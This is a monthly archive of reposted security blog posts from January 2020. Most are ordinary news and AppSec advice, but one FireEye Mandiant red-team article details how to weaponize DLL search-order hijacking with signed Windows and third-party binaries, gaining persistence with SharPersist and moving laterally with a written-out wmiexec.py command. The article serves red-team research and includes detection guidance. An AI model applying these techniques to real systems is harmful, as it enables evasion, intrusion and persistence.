Monthly Archives: January 2020

Cyber News Rundown: Magecart Hackers Arrested

Reading Time: ~ 2 min.

Indonesian Magecart Hackers Arrested

At least three individuals were arrested in connection to the infamous Magecart information stealing malware. Thanks to the combined efforts of several international law enforcement agencies, numerous servers issuing commands to awaiting Magecart scripts have been taken down in both Indonesia and Singapore. While these are not the only individuals who have profited from the Magecart code, they are the first to be identified and brought to justice.

German City Suffers Cyberattack

The City of Potsdam, Germany, is recovering from a cyberattack that took down parts of its administration systems. Fortunately, the systems were being actively monitored and were quickly taken offline to prevent data from being removed. It seems, after further investigation, that the servers were not fully patched with the latest updates. This could have allowed the attackers to move and execute malware freely.

Job Listings Used to Commit Fraud

A new wave of data theft has hit the job hunting crowd, making life harder for people looking to be hired. Cybercriminals have been creating phony sites with job listings for the purpose of absconding with the information one would normally provide an employer after accepting an offer. Though these types of scams have been executed in the past, they tend to reappear occasionally due to their continued success.

UK Court Freezes Bitcoin Wallet

After falling victim to a ransomware attack that shut down more than 1,000 computers, a Canadian insurance company took advantage of their cybersecurity policy to pay out a nearly $1 million ransom. By working with a cyber analysis firm, the company was able to track their ransom payment through the blockchain to a final wallet, which was then frozen by the currency exchange to stop further transactions and to identify the owners of the wallet. Though this may sound positive for the victims, they may be the target of additional negative repercussions like having their stolen data published or being attacked again.

South Carolina Water Company Shutdown

The Greenville Water service in South Carolina was hit with a cyberattack that took down all their systems for around the last week. As they continue to restore systems to proper function, officials have stated that no customer data was accessed, nor is any payment card data actually stored there. Fortunately, Greenville Water was able to return to normal functions within a week and informed customers that late fees would not be issued for payments made during the outage.

The post Cyber News Rundown: Magecart Hackers Arrested appeared first on Webroot Blog.

Abusing DLL Misconfigurations — Using Threat Intelligence to Weaponize R&D

DLL Abuse Techniques Overview

Dynamic-link library (DLL) side-loading occurs when Windows Side-by-Side (WinSxS) manifests are not explicit about the characteristics of DLLs being loaded by a program. In layman’s terms, DLL side-loading can allow an attacker to trick a program into loading a malicious DLL. If you are interested in learning more about how DLL side-loading works and how we see attackers using this technique, read through our whitepaper.

DLL hijacking occurs when an attacker is able to take advantage of the Windows search and load order, allowing the execution of a malicious DLL, rather than the legitimate DLL.

DLL side-loading and hijacking has been around for years; in fact, FireEye Mandiant was one of the first to discover the DLL side-loading technique along with DLL search order hijacking back in 2010. So why are we still writing a blog about it? Because it’s still a method that works and is used in real world intrusions! FireEye Mandiant still identifies and observes threat groups using DLL abuse techniques during incident response (IR) engagements. There are still plenty of signed executables vulnerable to this, and our red team has weaponized DLL abuse techniques to be part of our methodology. For detection and preventative measures on DLL abuse techniques, see the “Detection and Preventative Measures” section in this blog post.

Even though DLL abuse techniques are not new or cutting edge, this blog post will showcase how the FireEye Mandiant red team uses FireEye Intelligence to expedite the research phase of identifying vulnerable executables, at scale! We will also walk you through how to discover new executables susceptible to DLL abuse and how the FireEye Mandiant red team has weaponized these DLL abuse techniques in its DueDLLigence tool. The DueDLLigence tool was initially released to be a framework for application whitelisting bypasses, but given the nature of unmanaged exports it can be used for DLL abuse techniques as well.

Collecting and Weaponizing FireEye Intelligence

A benefit of being part of the red team at FireEye Mandiant is having access to a tremendous amount of threat intelligence; Our organization’s incident response and intelligence consultants have observed, documented, and analysed the actions of attackers across almost every major breach over the past decade. For this project, the FireEye Mandiant red team asked the FireEye Technical Operations and Reverse Engineering Advanced Practices (TORE AP) team to leverage FireEye Intelligence and provide us with all DLL abuse techniques used by attackers that matched the following criteria:

  1. A standalone PE file (.exe file) was used to call a malicious DLL
  2. The .exe must be signed and the certificate not expire within a year
  3. The intelligence about the technique must include the name of the malicious DLL that was called

Once the results were provided to the red team, we started weaponizing the intelligence by taking the approach outlined in the rest of the post, which includes:

  1. Identifying executables susceptible to DLL search order hijacking
  2. Identifying library dependencies for the executable
  3. Satisfying API’s exported in the library
DLL Search Order Hijacking

In many cases it is possible to execute code within the context of a legitimate Portable Executable (PE) by taking advantage of insecure library references. If a developer allows LoadLibrary to resolve the path of a library dynamically then that PE will also look in the current directory for the library DLL. This behavior can be used for malicious purposes by copying a legitimate PE to a directory where the attacker has write access. If the attacker creates a custom payload DLL, then the application will load that DLL and execute the attacker’s code. This can be beneficial for a red team: the PE may be signed and have the appearance of trust to the endpoint security solution (AV/EDR), it may bypass application white listing (AWL) and can confuse/delay an investigation process.

In this section we will look at one example where we identify the conditions for hijacking a PE and implement the requirements in our payload DLL. For this test case we will use a signed binary PotPlayerMini (MD5: f16903b2ff82689404f7d0820f461e5d). This PE was chosen since it has been used by attackers dating back to 2016.

Identifying Library Dependencies

It is possible to determine which libraries and exports a PE requires through static analysis with tools such as IDA or Ghidra. The screenshot shown in Figure 1, for example, shows that PotPlayerMini tries to load a DLL called “PotPlayer.dll”.


Figure 1: Static Analysis of DLL's loaded by PotPlayerMini

Where static analysis is not feasible or desirable it may be possible to use a hooking framework such as API Monitor or Frida to profile the LoadLibrary / GetProcAddress behavior of the application.

In Figure 2 we used API Monitor to see this same DLL loading behavior. As you can see, PotPlayerMini is looking for the PotPlayer.dll file in its current directory. At this point, we have validated that PotPlayerMini is susceptible to DLL search order hijacking.


Figure 2: Dynamic Analysis of DLL's loaded by PotPlayerMini

Satisfying Exports

After identifying potentially vulnerable library modules we need to apply a similar methodology to identify which exports are required from the module PE. Figure 3 shows a decompiled view from PotPlayerMini highlighting which exports it is looking for within the GetProcAddress functions using static analysis. Figure 4 shows performing this same analysis of exports in the PotPlayerMini application, but using dynamic analysis instead.


Figure 3: Static Analysis of exports in PotPlayerMini DLL


Figure 4: Dynamic Analysis of exports in PotPlayerMini DLL

In our case the payload is a .NET DLL which uses UnmanagedExports so we have to satisfy all export requirements from the binary as shown in Figure 5. This is because the .NET UnmanagedExports library does not support DllMain, since that is an entry point and is not exported. All export requirements need to be satisfied to ensure the DLL has all the functions exported which the program accesses via GetProcAddress or import address table (IAT). These export methods will match those that were observed in the static and dynamic analysis. This may require some trial and error depending on the validation that is present in the binary.


Figure 5: Adding export requirements in .NET DLL

Once we execute the binary, we can see that it successfully executes our function as shown in Figure 6.


Figure 6: Executing binary susceptible to DLL abuse

DLL Hijacking Without Satisfying All Exports

When writing a payload DLL in C/C++ it is possible to hijack control flow in DllMain. When doing this it is not necessary to enumerate and satisfy all needed exports as previously described. There also may be cases where the DLL does not have any exports and can only be hijacked via the DllMain entry point.

An example of this can be shown with the Windows Media Player Folder Sharing executable called wmpshare.exe. You can copy the executable to a directory out of its original location (C:\Program Files (x86)\Windows Media Player) and perform dynamic analysis using API Monitor. In Figure 7, you can see that the wmpshare.exe program uses the LoadLibraryW method to load the wmp.dll file, but does not specify an explicit path to the DLL. When this happens, the LoadLibraryW method will first search the directory in which the process was created (present working directory). Full details on the search order used can be found in  the LoadLibraryW documentation and the CreateProcess documentation.


Figure 7: Viewing LoadLibrary calls in wmpshare.exe

Since it does not specify an explicit path, you can test if it can be susceptible to DLL hijacking by creating a blank file named “wmp.dll” and copying it to the same directory as the wmpshare.exe file. Now when running the wmpshare executable in API Monitor, you can see it is first checking in its current directory for the wmp.dll file, shown in Figure 8. Therefore, it is possible to use this binary for DLL hijacking.


Figure 8: Viewing LoadLibrary calls in wmpshare.exe with dummy dll present

Figure 9 shows using the wmpshare executable in a weaponized manner to take advantage of the DllMain entry point with a DLL created in C++.


Figure 9: Using the DllMain entry point

Discovering New Executables Susceptible to DLL Abuse

In addition to weaponizing the FireEye intelligence of the executables used for DLL abuse by attackers, the FireEye Mandiant red team performed research to discover new executables susceptible to abuse by targeting Windows system utilities and third-party applications.

Windows System Utilities

The FireEye Mandiant red team used the methodology previously described in the Collecting and Weaponizing FireEye Intelligence section to look at Windows system utilities present in the C:\Windows\System32 directory that were susceptible to DLL abuse techniques. One of the system utilities found was the deployment image servicing and management (DISM) utility (Dism.exe). When performing dynamic analysis of this system utility, it was observed that it was attempting to load the DismCore.dll file in the current directory as shown in Figure 10.


Figure 10: Performing dynamic analysis of Dism utility

Next, we loaded the DISM system utility into API Monitor from its normal path (C:\Windows\System32) in order to see the required exports as shown in Figure 11.


Figure 11: Required exports for DismCore.dll

The code shown in Figure 12 was added to DueDLLigence to validate that the DLL was vulnerable and could be ran successfully using the DISM system utility.


Figure 12: Dism export method added to DueDLLigence

Third-Party Applications

The FireEye Mandiant red team also targeted executable files associated with common third-party applications that could be susceptible to DLL abuse. One of the executable files discovered was a Tortoise SVN utility (SubWCRev.exe).  When performing dynamic analysis of this Tortoise SVN utility, it was observed that it was attempting to load crshhndl.dll in the current directory. The export methods are shown in Figure 13.


Figure 13: Performing dynamic analysis of SubWCRev.exe

The code shown in Figure 14 was added to DueDLLigence to validate that the DLL was vulnerable and could be ran successfully using the Tortoise SVN utility.


Figure 14: SubWCRev.exe export methods added to DueDLLigence

Applying It to the Red Team

Having a standalone trusted executable allows the red team to simply copy the trusted executable and malicious DLL to a victim machine and bypass various host-based security controls, including application whitelisting. Once the trusted executable (vulnerable to DLL abuse) and malicious DLL are both in the same present working directory, the executable will call the corresponding DLL within the same directory. This method can be used in multiple phases of the attack lifecycle as payload implants, including phases such as establishing persistence and performing lateral movement.

Persistence

In this example, we will be using the Windows system utility Dism.exe discovered in the Windows System Utilities section as our executable, along with a DLL generated by DueDLLigence in conjunction with SharPersist to establish persistence on a target system. First, the DISM system utility and malicious DLL are uploaded to the target system as shown in Figure 15.


Figure 15: Uploading payload files

Then we use SharPersist to add startup folder persistence, which uses our DISM system utility and associated DLL as shown in Figure 16.


Figure 16: Adding startup folder persistence with SharPersist

After the target machine has been rebooted and the targeted user has logged on, Figure 17 shows our Cobalt Strike C2 server receiving a beacon callback from our startup folder persistence where we are living in the Dism.exe process.


Figure 17: Successful persistence callback

Lateral Movement

We will continue using the same DISM system utility and DLL file for lateral movement. The HOGWARTS\adumbledore user has administrative access to the remote host 192.168.1.101 in this example. We transfer the DISM system utility and the associated DLL file via the SMB protocol to the remote host as shown in Figure 18.


Figure 18: Transferring payload files to remote host via SMB

Then we setup a SOCKS proxy in our initial beacon, and use Impacket’s wmiexec.py to execute our payload via the Windows Management Instrumentation (WMI) protocol, as shown in Figure 19 and Figure 20.

proxychains python wmiexec.py -nooutput DOMAIN/user:password:@x.x.x.x C:\\Temp\\Dism.exe

Figure 19: Executing payload via WMI with Impacket’s wmiexec.py


Figure 20: Output of executing command shown in Figure 19

We receive a beacon from the remote host, shown in Figure 21, after executing the DISM system utility via WMI.


Figure 21: Obtaining beacon on remote host

Detection and Preventative Measures

Detailed prevention and detection methods for DLL side-loading are well documented in the whitepaper and mentioned in the DLL Abuse Techniques Overview. The whitepaper breaks it down into preventative measures at the software development level and goes into recommendations for the endpoint user level. A few detection methods that are not mentioned in the whitepaper include:

  • Checking for processes that have unusual network connectivity
    • If you have created a baseline of normal process network activity, and network activity for a given process has become different than the baseline, it is possible the said process has been compromised.
  • DLL whitelisting
    • Track the hashes of DLLs used on systems to identify discrepancies.

These detection methods are difficult to implement at scale, but possible to utilize. That is exactly why this old technique is still valid and used by modern red teams and threat groups. The real problem that allows this vulnerability to continue to exist has to do with software publishers. Software publishers need to be aware of DLL abuse techniques and know how to prevent such vulnerabilities from being developed into products (e.g. by implementing the mitigations discussed in our whitepaper). Applying these recommendations will reduce the DLL abuse opportunities attackers use to bypass several modern-day detection techniques.

Microsoft has provided some great resources on DLL security and triaging a DLL hijacking vulnerability.

Conclusion

Threat intelligence provides immense value to red teamers who are looking to perform offensive research and development and emulate real-life attackers. By looking at what real attackers are doing, a red teamer can glean inspiration for future tooling or TTPs.

DLL abuse techniques can be helpful from an evasion standpoint in multiple phases of the attack lifecycle, such as persistence and lateral movement. There will continue to be more executables discovered that are susceptible to DLL abuse and used by security professionals and adversaries alike.

Best Practices and Practical Steps to Guide Your AppSec Journey

Imagine that you are tasked with planning a vacation for you and your family. For your ideal trip, you would jet off to a five-star resort on a private island for a month of pampering and fine dining. But, since you have two children, a limited budget, and only one week of paid time off, you settle for a three-star, theme park resort with a spa and outdoor pool. Your family has a great time on the vacation and, using your new-found trip planning skills, you start preparing and saving for your dream getaway.

Spearheading an application security (AppSec) program can sometimes feel a little like that type of vacation planning ??? you can see an ideal state, but it can feel unattainable. Just like planning a vacation, creating an AppSec program is also dependent on time and money, as well as an organization???s staff expertise, culture, and executive support.

Below, we look at both the best practices, and some practical first steps you can take that will prepare your AppSec program for improvements in the future. In other words, keep your eye on the private island AppSec, while moving forward with the theme park AppSec.

Best Practice #1: Use More Than One Application Security Testing Type

When you visit the doctor with an ailment, you undergo several tests to determine the diagnosis. There is no magic test that detects all illnesses. The same goes for AppSec tests ??? there is no one test that detects every vulnerability. So, to make sure that your application is fully secure, the best practice is to use as many testing types as possible.

Practical Advice: Start with What Makes the Most Sense, Then Add More Later

Develop an AppSec strategy to determine where you need AppSec solutions the most. Start by implementing the tests that will have the most impact, in the shortest amount of time, for the least amount of money. From there, you can start adding on more tests.

There are several factors that will help determine which tests will have the most impact. For example, if you have multiple applications, rank the applications based on the criticality of their risks, and test the applications with the most critical risks first. Another thing to consider is programming languages. If you leverage less-mainstream programming languages, there are limitations regarding the AppSec tests you can use. So start with tests that are not specific to language, like dynamic or penetration testing.

Best Practice #2: Shift Security Left

In today???s fast-paced world, enterprises are moving from yearly product releases to monthly, weekly, or daily releases. To keep up with this change, security testing needs to be woven into the development cycle instead of after the development cycle. That way, when it is time to release the product, security testing will not stand in the way.

Practical Advice: Shift Security Culture Left

Moving security testing into the development cycle means that developers will play a bigger security role. Since most development and security teams have never worked together, ???shifting security left??? can be a significant cultural change.

Before making this change, a good first step is to help security understand how development works and to build a relationship. Understanding how development works involves learning their tools and process, as well as how they build software, so that security testing can be integrated organically. When security is organically weaved into the development process, developers are more likely to be receptive of security, making it easier to forge trusting relationships.

You should also look for ways to automate security testing into the CI/CD pipeline. By integrating automated security tools into the CI/CD pipeline, you can incorporate testing without handing off code to another team, making it easier for developers to fix issues immediately.

Best Practice #3: Fix Everything Fast

Finding vulnerabilities is only half of the battle. You need to have a solid plan in place to fix them once they are discovered. Automating security testing in CI/CD pipelines allows organizations to not only find flaws faster, but it also speeds up the remediation process.

Practical Advice: Prioritize Fixes While Creating Fewer Vulnerabilities

As much as we would love to fix all flaws instantaneously, it is not possible. A practical first step in remediation is prioritizing. When prioritizing your flaws, do not just concentrate on defect severity, also consider the criticality of the application and how easy it would be to exploit the flaw.

Best Practice #4: Embed Security Champions into Development Teams

Most developers do not have a security background. This makes it very challenging when you try to implement security tests in the development lifecycle. A way to help fill this knowledge gap is to select interested volunteers from the development teams to become security champions. Security champions learn about security testing and can reiterate important security messages back to their teams.

Practical Advice: Build Up Your Security Champions Capabilities

Building a team of security champions takes time. Start by making sure your organization???s security, development, and leadership teams are all on board with the security champions concept. Once everyone agrees with the idea, help the security and development teams build a relationship. If developers and security personnel are on good terms, you have a much better chance of developers agreeing to become security champions.

Next, identify your champions. Security champions should be selected based on a demonstrated or perceived interest in learning more about security. If you select developers who do not have an interest in security, there is a high probably that they will not be successful in the role. Lastly, nurture your identified champions by giving them the appropriate tools and support, like additional training in security concepts and code reviews, needed for success.

Best Practice #5: Measure Your AppSec Results

It???s critical to be able to measure and report on the success of an AppSec program in metrics. Identify which metrics are most important to your organization???s key decision-makers, then display the metrics in an easy-to-understand, actionable manner.

Practical Advice: Focus on Your Policy Metric

Bringing too many metrics to your executives early on can be overwhelming and, quite frankly, unnecessary. Start by presenting one metric: how your AppSec program is complying with your internal AppSec policy. From here, you can start sharing other valuable metrics.

Remember, just like saving for your dream getaway, creating the perfect AppSec program takes time. But taking practical steps and looking toward the big picture will help you get closer to perfect sooner.

Learn more about the steps you can take to achieve AppSec maturity in our recent guide, Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start.

Jeff Bezos met FBI investigators in 2019 over alleged Saudi hack

Amazon founder interviewed as FBI conducts inquiry into Israeli firm linked to malware

Jeff Bezos met federal investigators in April 2019 after they received information about the alleged hack of the billionaire’s mobile phone by Saudi Arabia, the Guardian has been told.

Bezos was interviewed by investigators at a time when the FBI was conducting an investigation into the Israeli technology company NSO Group, according to a person who was present at the meeting.

Continue reading...

Weekly Update 176

Weekly Update 176

Well that's the audio issues fixed - mostly. The Zoom H6 is an awesome recorder, I just can't quite work out the right adaptors for the mic. I've got a couple of Saramonic SR-XLM1 lav mics and the guy at the DJ store I bought the Zoom from was convinced we'd be fine with just with 3.5mm to 6.35mm jack converters which appears to be incorrect. Someone else hen said we'd need a TRRS to TRS adaptor so we grabbed a couple of Rode SC3s which also didn't solve the problem. So, keeping in mind we have no idea what we're doing (and missing), can someone explain the gap here and what's required to fill it?

In other news, we're at the tail end of NDC London where we've wrapped up our individual and joint talks. Scott's talking a lot about the history of crypto and where we now are with SSL Labs changing ratings when older TLS versions are found and browsers deprecating support for them. Oh - and incidentally, Cloudflare does enable you to no longer support older versions of TLS and I've had my things set at a minimum of 1.2 for quite some time now. I'm back on the plane to Aus in just a few hour's time so the next update will be from somewhere sunny - with good audio!

Weekly Update 176
Weekly Update 176
Weekly Update 176
Weekly Update 176

References

  1. SSL Labs is changing the grade for websites still supporting TLA 1.0 or 1.1 (this'll cap a bunch of sites rating well today at "B" once it hits)
  2. The DHS cyber chief uses Have I Been Pwned to monitor his breach exposure (it's always cool to see use cases like this 😎)
  3. Legacy TLS is being deprecated in the browsers (that's Scott's latest blog post, interesting reading if you're not supporting new versions of TLS)
  4. Scott played "hand model" whilst the BBC filmed his implant (clip there from when he got it fitted)
  5. Sponsored by: SecurityFWD. A brand new YouTube show from Varonis. Watch Episode 1: How Far can Wi-Fi Travel?

Say hello to OpenSK: a fully open-source security key implementation



Today, FIDO security keys are reshaping the way online accounts are protected by providing an easy, phishing-resistant form of two-factor authentication (2FA) that is trusted by a growing number of websites, including Google, social networks, cloud providers, and many others. To help advance and improve access to FIDO authenticator implementations, we are excited, following other open-source projects like Solo and Somu, to announce the release of OpenSK, an open-source implementation for security keys written in Rust that supports both FIDO U2F and FIDO2 standards.

Photo of OpenSK developer edition: a Nordic Dongle running the OpenSK firmware on DIY case

By opening up OpenSK as a research platform, our hope is that it will be used by researchers, security key manufacturers, and enthusiasts to help develop innovative features and accelerate security key adoption.

With this early release of OpenSK, you can make your own developer key by flashing the OpenSK firmware on a Nordic chip dongle. In addition to being affordable, we chose Nordic as initial reference hardware because it supports all major transport protocols mentioned by FIDO2: NFC, Bluetooth Low Energy, USB, and a dedicated hardware crypto core. To protect and carry your key, we are also providing a custom, 3D-printable case that works on a variety of printers.

“We’re excited to collaborate with Google and the open source community on the new OpenSK research platform,” said Kjetil Holstad, Director of Product Management at Nordic Semiconductor. “We hope that our industry leading nRF52840’s native support for secure cryptographic acceleration combined with new features and testing in OpenSK will help the industry gain mainstream adoption of security keys.”

While you can make your own fully functional FIDO authenticator today, as showcased in the video above, this release should be considered as an experimental research project to be used for testing and research purposes.


Under the hood, OpenSK is written in Rust and runs on TockOS to provide better isolation and cleaner OS abstractions in support of security. Rust’s strong memory safety and zero-cost abstractions makes the code less vulnerable to logical attacks. TockOS, with its sandboxed architecture, offers the isolation between the security key applet, the drivers, and kernel that is needed to build defense-in-depth. Our TockOS contributions, including our flash-friendly storage system and patches, have all been upstreamed to the TockOS repository. We’ve done this to encourage everyone to build upon the work.


How to get involved and contribute to OpenSK 

To learn more about OpenSK and how to experiment with making your own security key, you can check out our GitHub repository today. With the help of the research and developer communities, we hope OpenSK over time will bring innovative features, stronger embedded crypto, and encourage widespread adoption of trusted phishing-resistant tokens and a passwordless web.

Acknowledgements

We also want to thank our OpenSK collaborators: Adam Langley, Alexei Czeskis, Arnar Birgisson, Borbala Benko, Christiaan Brand, Dirk Balfanz, Dominic Rizzo, Fabian Kaczmarczyck, Guillaume Endignoux, Jeff Hodges, Julien Cretin, Mark Risher, Oxana Comanescu, Tadek Pietraszek

NICE Webinar: Learning Principles for Cybersecurity Practice

The PowerPoint slides used during this webinar can be downloaded here. Speakers: Craig Jackson Program Director, Indiana University’s Center for Applied Cybersecurity Research Scott Russell Senior Policy Analyst, Indiana University’s Center for Applied Cybersecurity Research Susan Sons Chief Security Analyst, Indiana University’s Center for Applied Cybersecurity Research Synopsis: The NICE Cybersecurity Workforce Framework includes a few knowledge statements that are common for all work roles, including “Knowledge of cybersecurity and privacy principles.” What are the “cybersecurity principles

What Software Composition Analysis and Your Dentist Have in Common

SAST, DAST, IAST, SCA ??ヲ confused about the differences? We thought it might be helpful to clear things up by using the analogy of human health. When you visit the doctor with an ailment, or even for a routine checkup, you are likely to undergo a series of tests to find potential health conditions or diseases. Since the tests are targeting different parts of the mind or body, the results may vary. So, the more tests performed, the better the chances of discovering and treating an illness. The same logic applies to security health. The more application security tests performed, the better the odds are that you will find and remediate security flaws or vulnerabilities.

Now that we understand the importance of the application security tests, and we know that they are looking for different vulnerabilities and flaws, how can we distinguish between them? We will continue with the human health analogy, comparing AppSec tests to common, easy-to-understand health tests.

Static analysis

Make no bones about it, static analysis is very similar to an X-ray. Just like X-rays, which produce a static image to find torn and broken bones, static analysis evaluates an application from the inside out, reviewing stationary code for security vulnerabilities. By catching the vulnerabilities before running the application, developers can fix flaws in a timely, cost-efficient manner.

Dynamic analysis

Dynamic analysis is comparable to a reflex test. During a reflex test, the doctor taps a tendon to make sure that the patient???s motor and sensory skills are intact. Dynamic analysis leverages a similar outside-in approach, poking and prodding at the running application to analyze vulnerabilities.

Software composition analysis

For software composition analysis (SCA), you can think of a dental exam. During a dental exam, if you have cavities, your fillings are inspected. Although fillings are not an organic part of the body, if undetected and untreated, faulty dental fillings can lead to serious illness. This concept is a lot like software composition analysis. SCA inspects open source code for vulnerabilities. This is code that you didn't write yourself, but it's still affects the security and the health of the application. Despite the fact that open source is a third-party component, if vulnerabilities go undetected, it is nothing to smile about.

Interactive analysis

Interactive analysis can best be compared to an Electrocardiography (EKG) exam. An EKG is when a doctor puts electrodes on your chest to measure your heart rate. The doctor might have you exercise while conducting the EKG to evaluate your heart under stress. With interactive analysis, you place an agent in the runtime environment and put the application under load. From there, you can see what vulnerabilities the agent discovers.

Penetration test

A penetration test is the equivalent of a doctor???s personal assessment. When you visit the doctor and convey your symptoms, the doctor uses their expertise to provide a diagnosis. It is not unusual for the doctor to pick up on an illness that is undetectable by an exam. Similarly, with a penetration exam, an expert penetration tester simulates a security attack on the application to find vulnerabilities often undetectable by other, more automated methods.

So, the next time you visit the doctor and undergo several tests, remember that each test holds a purpose. And when it is time to evaluate your AppSec program, remember that the same logic holds true. The more security tests you are able to perform, the better the chances of catching vulnerabilities.

Learn More

Get more details on the strengths and weaknesses of the different AppSec testing types in our recent guide, Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start.

Computer-Based Training: 2019 in Review

Software security is no longer just about writing secure code.  Everyone who provisions, operates, analyzes, or defends software systems needs job-specific guidance.  That’s why we’ve taken a role-based approach, following guidance provided by resources like the NICE Framework – making it easy to acquire appropriate training for your teams.

Vulnerability Reward Program: 2019 Year in Review



Our Vulnerability Reward Programs were created to reward researchers for protecting users by telling us about the security bugs they find. Their discoveries help keep our users, and the internet at large, safe. We look forward to even more collaboration in 2020 and beyond.

2019 has been another record-breaking year for us, thanks to our researchers! We paid out over $6.5 million in rewards, doubling what we’ve ever paid in a single year. At the same time our researchers decided to donate an all-time-high of $500,000 to charity this year. That’s 5x the amount we have ever previously donated in a single year. Thanks so much for your hard work and generous giving!
Since 2010, we have expanded our VRPs to cover additional Google product areas, including Chrome, Android, and most recently Abuse. We've also expanded to cover popular third party apps on Google Play, helping identify and disclose vulnerabilities to impacted app developers. Since then we have paid out more than $21 million in rewards*. As we have done in years past, we are sharing our 2019 Year in Review across these programs.
What’s changed in the past year?

  • Chrome’s VRP increased its reward payouts by tripling the maximum baseline reward amount from $5,000 to $15,000 and doubling the maximum reward amount for high quality reports from $15,000 to $30,000. The additional bonus given to bugs found by fuzzers running under the Chrome Fuzzer Program is also doubling to $1,000. More details can be found in their program rules page.
  • Android Security Rewards expanded its program with new exploit categories and higher rewards. The top prize is now $1 million for a full chain remote code execution exploit with persistence which compromises the Titan M secure element on Pixel devices. And if you achieve that exploit on specific developer preview versions of Android, we’re adding in a 50% bonus, making the top prize $1.5 million. See our program rules page for more details around our new exploit categories and rewards.
  • Abuse VRP engaged in outreach and education to increase researchers awareness about the program, presenting an overview of our Abuse program in Australia, Malaysia, Vietnam, the UK and US.
  • The Google Play Security Reward Program expanded scope to any app with over 100 million installs, resulting in over $650,000 in rewards in the second half of 2019.
  • The Developer Data Protection Reward Program was launched in 2019 to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions.
We also had the goal of increasing engagement with our security researchers over the last year at events such as BountyCon in Singapore and ESCAL8 in London. These events not only allow us to get to know each of our bug hunters but also provide a space for bug hunters to meet one another and hopefully work together on future exploits.

A hearty thank you to everyone that contributed to the VRPs in 2019. We are looking forward to increasing engagement even more in 2020 as both Google and Chrome VRPs will turn 10. Stay tuned for celebrations. Follow us on @GoogleVRP

*The total amount was updated on January 28; it previously said we paid out more than $15 million in rewards.

Huawei set for limited UK 5G role, but can we Trust Huawei?

Today the UK Government decided Huawei can be allowed to help build the UK's 5G network, but remain banned from supplying kit to "sensitive parts" of the core network. The Prime Minister Boris Johnson made long await decision to ends months of concern for the Chinese telecoms giant. 

The PM had briefed US President Donald Trump about the decision. Trump has been very vocal on his stance exclaiming, “we are not going to do business with Huawei”, and recently Trump’s administration is reportedly nearing publication of a rule that could further block shipments of US-made goods to Huawei. Trump administrator has said it 'is disappointed' with UK government decision. China had warned the UK there could be "substantial" repercussions to other trade and investment plans had the company been banned outright.

There was ferocious debate in the UK parliament post the government announcement, with MPs calling into question the cybersecurity risks which could prevail – the US says the cybersecurity risks are severe, the UK’s security services say they can be managed, whereas Australia has opted for an outright ban. There’s a clear disconnect and the decision today could cause turmoil to the US/UK working relationship that could ultimately impact a post-Brexit trade deal.

Can Huawei be trusted or will using its equipment leave communication networks, and our own mobile phones, vulnerable? The US says Huawei is a security risk, given the firm is heavily state supported and is run by Mr Ren who served in the Chinese military. Huawei 5G equipment could be used for spying and negatively impacting critical national infrastructure. 

The National Cyber Security Centre (NCSC) published a document which says UK networks will have three years to comply with the caps on the use of Huawei's equipment.

"Huawei is reassured by the UK government's confirmation that we can continue working with our customers to keep the 5G rollout on track. It gives the UK access to world-leading technology and ensures a competitive market." the firm's UK chief Victor Zhang said in a statement.

UK security professionals have reported significant concerns around how digital transformation projects and the implementation of 5G will affect their risk posture. 89% of UK businesses said they have concerns around the implementation of emerging technologies and essential digital transformation projects and almost four in ten (38%) expect digital transformation and 5G to offer cybercriminals more effective and more destructive methods of achieving their nefarious goals, according to research from VMWare Carbon Black.

A10 Networks' VP of Strategy, Gunter Reiss said “The global dispute over whether tech giant Huawei should be used in national 5G networks has created a lot of geopolitical conversations around the 5G build-out, security to Critical National Infrastructure, and generally whether certain vendors should be included or excluded. However, operators need to base their decisions not on these opinions but on technology – the strength, innovation and security capabilities. With the massive increases in bandwidth, number of devices predicted to be on these networks and the growing security requirements, the technology being used must meet these needs.


A Security Compromise on Economical Grounds
"This is a good compromise between alleviating 'security' concerns and making sure that the 5G UK market is not harmed," commented Dimitris Mavrakis, a telecoms analyst at ABI Research. Previously I posted about National Security Vs Economic argument which has been behind the UK government decision - see The UK Government Huawei Dilemma and the Brexit Factor 

The next casualty of cyberwar could be your business

How do you prepare for truly unknown cyberattacks or threats to physical security?

It’s a question that we all have to ask in the aftermath of the missile strikes exchanged with Iran. As many are (rightly) concerned with the possibility of a traditional war starting in the Middle East, it is likely that retaliation will happen over cyberspace, putting all our networks and infrastructure at risk.

What’s most worrisome about these initial strikes is the lack of transparency. Most members of Congress had no idea the attack was imminent, and when they were briefed, many complained that their questions went unanswered.

If Congress isn’t being told what is happening, you can be sure the CISOs of major corporations aren’t being told or aware of any incidents that could have life-altering physical and cyber consequences. So with no possible coordination, how can you possibly be prepared?

To read this article in full, please click here

NIST Tests Forensic Methods for Getting Data From Damaged Mobile Phones

Criminals sometimes damage their mobile phones in an attempt to destroy evidence. They might smash, shoot, submerge or cook their phones, but forensics experts can often retrieve the evidence anyway. Now, researchers at the National Institute of Standards and Technology (NIST) have tested how well these forensic methods work. A damaged phone might not power on, and the data port might not work, so experts use hardware and software tools to directly access the phone’s memory chips. These include hacking tools, albeit ones that may be lawfully used as part of a criminal investigation. Because

How will Cyber Essentials changes affect you?

In a move to standardise the requirements for Cyber Essentials certification, from 1st April 2020 the IASME Consortium will be the National Cyber Security Centre’s sole Cyber Essentials Partner (formerly accreditation body), and the other four accreditation bodies will no longer be involved in the scheme.

The National Cyber Security Centre (NCSC) is the authority for appointing Cyber Essentials accreditation bodies on behalf of HMG.

How will this affect certification applications/renewals?

  • All existing certification bodies will continue to operate as normal until 31 March 2020.
  • Applicants should apply for new certification/renewal under the current scheme’s requirements through any existing certification body.
  • Certificates issued from applications that were submitted before 1 April 2020 will be valid for at least 12 months.
  • If you apply for new or renew your Cyber Essentials certification with your existing certification body by 31 March 2020, you will have until 30 June 2020 to complete the application process (provided the application was started by 31 March and is being actively progressed).
  • All existing structures that were put in place under the current scheme to obtain certification will remain valid until 31 March 2020.
  • Vulnerability scans that were required under CREST-accredited certification bodies will still be required for applications purchased before 31 March 2020.

From 1 April 2020, any organisation that wants to apply for Cyber Essentials or renew their certification will need to follow the new process as required by IASME.

What can you expect from the new process after 31 March 2020?

  • All certification processes will be standardised through IASME.
  • Vulnerability scans that were required by certain certification bodies will no longer form part of the requirements for Cyber Essentials basic certification.
  • All Cyber Essentials applications and renewals will need to be completed using the IASME self-assessment questionnaire.
  • The questionnaire requires applicants to answer open-ended questions in free text format.
  • All applications need to be manually reviewed by an assessor. The open-ended free text format could lead to a lengthier and more onerous certification review process than the existing CREST questionnaire.
